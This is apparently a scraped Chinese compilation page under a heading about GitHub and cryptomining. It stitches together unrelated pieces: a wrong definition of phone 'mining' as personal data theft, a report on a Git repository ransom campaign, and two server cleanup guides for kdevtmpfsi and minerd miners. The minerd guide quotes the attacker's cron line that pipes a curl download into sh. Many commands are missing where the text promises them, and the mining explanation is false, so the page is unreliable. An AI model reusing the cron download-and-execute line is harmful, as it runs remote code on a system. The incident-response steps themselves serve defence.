github被黑客用了挖矿的简单介绍
本文目录一览:
- 1、手机被别人挖矿是什么意思
- 2、威胁删库?程序员:“呵呵,一分都不给你!”
- 3、服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马
- 4、阿里云服务器被挖矿了怎么办?(纯纯电脑小白
- 5、程序员大本营网站有病毒吗
手机被别人挖矿是什么意思
被挖矿是指浏览不良网站背后的黑客会通过程序窃取你的个人信息。
一旦出现这种情况,那么就说明你的个人信息肯定是已经泄露了,而一般的正规网站是不会泄露用户的个人信息,只有经常浏览一些钓鱼网站、盗版资源网站和不良网站,才会导致个人信息泄露。另外,申请好友的陌生人,基本都是一些带着“美女头像”,且备注的信息都充满诱导性,而目的就是为了让我们同意。
威胁删库?程序员:“呵呵,一分都不给你!”
近日,一些黑客又不安分了,他们正以删除 GitHub 代码库为由,勒索受害程序员交出手中的比特币。
据 Bleeping Computer 爆料,黑客通过使用从第三方代码库管理服务泄露的帐户凭证,获得了包括 GitHub、GitLab 和 Bitbucket 等代码库的访问权限。
但是到目前为止,这些黑客还没有赚到足够的钱去星巴克买一杯咖啡。
截止到撰文时间,黑客勒索信中提到的比特币地址只收到了一笔转账,只有可怜的 0.00052525BTC(约为22RMB)。
黑客擦除了被攻击代码库中的代码和提交 历史 ,只留下了一个带有勒索性质的文件:
黑客“承诺”,只要受害程序员支付 0.1BTC(约为587美元),他们就会还原被盗的代码库。
尽管黑客可能为每封勒索信生成一个新地址,但这个地址已经在 GitHub 和 GitLab 上使用很多次了。目前,Bitcoin Abuse 上已经收到了37份关于这个地址的报告。
但到目前为止,从黑客迄今收取的赎金 (在北京,能买一份鱼香肉丝) 来看,程序员似乎并不是敲诈勒索的最佳目标。
比如这位程序员,就很牛 X 啊。
找到了,代码库并没有消失
一位名为 Stefan Gabos 的受害者在 Stack Exchange 上提出了一个解决方案,虽然他的解决方案还没有得到大多数程序员的认可,但是值得考虑。
Stefan Gabos 如何应对删库威胁并成功恢复代码? 他是这样做的:
我当时正在做一个项目,一个私有 repo,突然间代码库中的所有提交就消失了。
我当时正在使用 SourceTree(我确定更新到了最新版本),但我仍怀疑问题所在可能就是 SourceTree,或者电脑 Windows10 系统遭到了破坏。
在我的所有代码库中,只有这一个代码库受到了影响。我更改了密码,启用了双重认证,删除了一个多年未用的访问令牌,并给 GitLab 写了一封电子邮件,希望他们能告诉我攻击者是谁、从哪里入侵了我的系统。
有人可能会说,如果他们是这样进来的,他们可能只是改变了帐户的凭证,但在互联网上搜索显示,在这些情况下 Gitlab/Github 会简单地为你恢复凭证,所以我认为这就是他们没有这样做的原因。
除了我之外,还有4个开发人员正在开发它,他们都可以完全访问被盗的代码库,因此他们的账户也有可能被入侵。
我用 BitDefender 扫描了我的电脑,但并没有发现任何问题。我没有在网上做什么见不得人的事,所以 我不认为我的电脑感染了什么病毒和木马、甚至装了一些恶意软件 。
我正在等待 GitLab 的回复,也许他们能为此提供一些线索。此外,为防止代码库被发布到其他地方,我更改了数据库、IMAP 帐户源中所有可能涉及到的密码。
出人意料,我发现代码并没有消失。
我尝试访问了一个之前提交的 hash,哇,竟然成功了。
所以代码是存在的,只是 HEAD 有点问题。
尽管我这方面的知识非常有限,但只要输入:
就能显示所有提交(commits)。
这就意味着攻击者很可能没有克隆代码库 ,而且他们通过检查源代码获取敏感数据或公开代码的几率很低;这可能不是一个有针对性的攻击,而是由一个脚本执行的随机的大规模攻击。
更令人开心的是,如果你输入:
你会看到攻击者所有的提交(commits)。
再输入:
你会看到所有“丢失”的文件。
再输入:
代码库的 origin/master 已经被修复...
但当你输入:
却显示:
HEAD 已从 origin/master 中删除,正在寻找修复方法...
如果代码文件保存在 本地 ,运行以下代码命令:
Bingo!代码库回来了!
、 这只是代码库存在本地时的解决方法。
因此, 现在唯一的问题是,如果你没有保存本地 repo,什么样的代码命令可以使得代码库恢复呢? 至于攻击细节问题, 我希望 GitLab 的答案能解决我的困扰 。
在写给 ZDNet 的一封电子邮件中,GitLab 的安全主管 KathyWang 承认,Stefan Gabos 在 Stack Exchange 上提出的问题正是账户泄露的根本原因。
“我们根据 Stefan Gabos 昨天提交的内容确认了消息来源,并立即开始调查此事。我们已经确定了受影响的用户帐户,并且向他们一一通知。证据表明,丢失帐户的帐户密码以明文形式存储在相关存储库的部署(deployment)中。我们强烈建议使用密码管理工具以更安全的方式存储密码,并在可能的情况下启用双重身份验证,这两种方法都可以避免这个问题。”
微软与 Github 再背锅?
GitLab 并不是唯一受影响的网站。GitHub 和 Bitbucket 也遭到了同样的攻击和比特币勒索,多达1000个 Bitbucket 用户受到了影响。
但Bitbucket 和 GitLab 表示,他们的安全系统不存在任何问题。
Bitbucket 指出, 黑客是通过提交正确的用户名和密码获得了对用户账户的访问权限 。 “我们认为这些凭证可能是通过另一个服务泄露的,因为其他 git 托管服务正在经历类似的攻击。我们没有在上 Bitbucket 发现其他危害”。
他们怀疑是微软和 Github 的问题 (微软去年以75亿美元收购了 GitHub) 。
就在几天前,据 Micky 爆料,今年1月份微软曾轻描淡写般地回应了黑客利用 Outlook、MSN 和 Hotmail 安全漏洞盗区加密货币的事件。对此,微软表示,只有主题/标题和电子邮件地址被盗,邮件内容并未被盗取。
但几个月后,受害者发现其邮件内容已经被盗了,黑客通过邮件内容获取了受害者的加密货币账户并残忍地清空了账户内的加密货币。
这并不是新鲜事,删库威胁太low了
比特币性勒索诈骗已经是2018年的事了,对吧?不过,有些黑客可不这么认为。
美国堪萨斯州诺顿镇的居民正成为黑客攻击的目标。黑客威胁说,除非受害者支付比特币赎金,否则将公布一些“敏感东西”。
为此,堪萨斯州诺顿显警察局在其 Facebook 页面上还发布了一则公告,警告当地居民注意这种危险。
黑客声称通过远程控制受害者电脑的方式窃取受害者的个人数据,并拍摄了受害者观看色情片的视频。黑客还坚称,他们还有受害者当时正在看什么的屏幕截图。
如果受害者向黑客支付价值800美元的比特币,他们就承诺不会泄露受害者的视频和照片。
值得庆幸的是,这些受害者是勇敢的,没有人落入这个令人作呕的骗局。在撰写本文时,电子邮件中列出的钱包地址仍然是空的。
但去年的受害者就没这么聪明了。
在另一起比特币诈骗案中,一个黑客在几天内就赚了 17000 美元。
在这类骗局数不胜数,早在今年2月,HardFork 就发布了一份报道,报告指出,黑客通过这类骗局已经诈取了超过33.2万美元的钱财。
程序员,如果是你呢?
那如果是你呢?你受到了这样的威胁和勒索,你该怎么办?
正如诺顿县警方建议的那样,如果你收到这样的邮件, 请忽略它,也不要打开任何链接 ,当然也 不要将任何比特币发到邮件中列出的地址 。
在 Twitter 上,开发者社区的一些重要人物正在敦促受害者在支付任何赎金要求之前联系 GitHub、GitLab 或 Bitbucket 的支持团队,因为可能存在其他方法来恢复被删除的代码库。
值得庆幸的是,程序员对黑客的这种“小伎俩”并不感冒。
服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马
MongoDB库中的数据莫名其妙没有了,发觉如下信息:
1、 top -d 5命令 ,查看系统负载情况、是否有未知进程,发现一个名为kdevtmpfsi的进程,经科普它是一个挖矿程序,会占用服务器高额的CPU、内存资源。如图,CPU占用率高达788.7%,而且是yarn用户下:
2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径:/tmp/kdevtmpfsi
3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息(此时我的服务器并没有开启yarn服务,如果有yarn的相关进程则可判断是攻击者开启的进程),发现另外还有个kinsing进程,经科普kinsing进程是kdevtmpfsi的守护进程:
4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip,判断是kdevtmpfsi的发出者:
5、经查询该ip的所在国家是俄罗斯:
6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除:
7、 cd /tmp 进入相关目录:
8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序:
9、** kill -9 40422**杀掉kdevtmpfsi进程:
10、发现并没杀掉所有kdevtmpfsi进程,再次查找yarn的相关进程(因为之前已确认病毒是在yarn下),果真还有kdevtmpfsi进程存在:
11、用命令 批量杀掉 相关进程:
12、删除kinsing文件:
13、现在,已经把挖矿程序及相关进程删除掉了,但是还有两处没做处理:
14、 crontab -l 命令先看看crontab的定时任务列表吧:
15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh :
16、新增 定时任务 并删除攻击者的挖矿定时任务:
17、 crontab -l命令 查看现在只有杀进程的定时任务了:
18、禁止黑客的IP地址。
最初安装MongoDB时,并未设置密码认证,存在漏洞,导致黑客通过漏洞攻击服务器,并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的,治标不治本,应该定时删除病毒进程,禁止攻击者IP,重新安装系统或相关软件。
经过几天的观察,服务器运行正常,再没有被黑客攻击成功。
阿里云服务器被挖矿了怎么办?(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
程序员大本营网站有病毒吗
程序员大本营网站没有病毒。程序员大本营是被黑客攻击了。五一小长假期间,当不少程序员进入知名软件源代码托管站GitHub时发现,自己托管的代码已经消失不见,取而代之的是一封勒索信。黑客在信上写到,他们已经将源代码下载并存储到了自己的服务器上。
要求受害者在10天之内,往特定账户支付0.1比特币约合人民币3800元,否则他们将会公开代码,或以其他的方式使用它们。
程序员大本营被攻击
不仅仅是GitHub,其他代码托管网站GitLab、Bitbucket也受到了攻击。据GitHub统计,受本次攻击影响的代码库已经达到近400个,GitHub回应,目前正在与受影响的用户联系,以保护和恢复他们的账户。
据cnBeta报道,此次Git仓库被黑客洗劫勒索的事件,微软似乎也未能幸免,并同样被要求支付款项才能归还被窃取的392个源码。
GitLab安全总监Kathy Wang发表声明说,我们已确定受影响的用户帐户,并已通知所有这些用户。根据调查结果,我们有充分证据表明受损帐户的帐户密码以明文形式存储在相关存储库的部署中。GitLab建议用户要提高安全意识,使用强密码。
代码泄露不仅事关公司的知识产权,还涉及到用户的数据安全。在国内,就有企业吃过苦头。2019年,一位大疆员工无意间将公司源代码泄露到GitHub,给大疆造成116.4万元的经济损失。这名员工最终被罚20万获刑半年。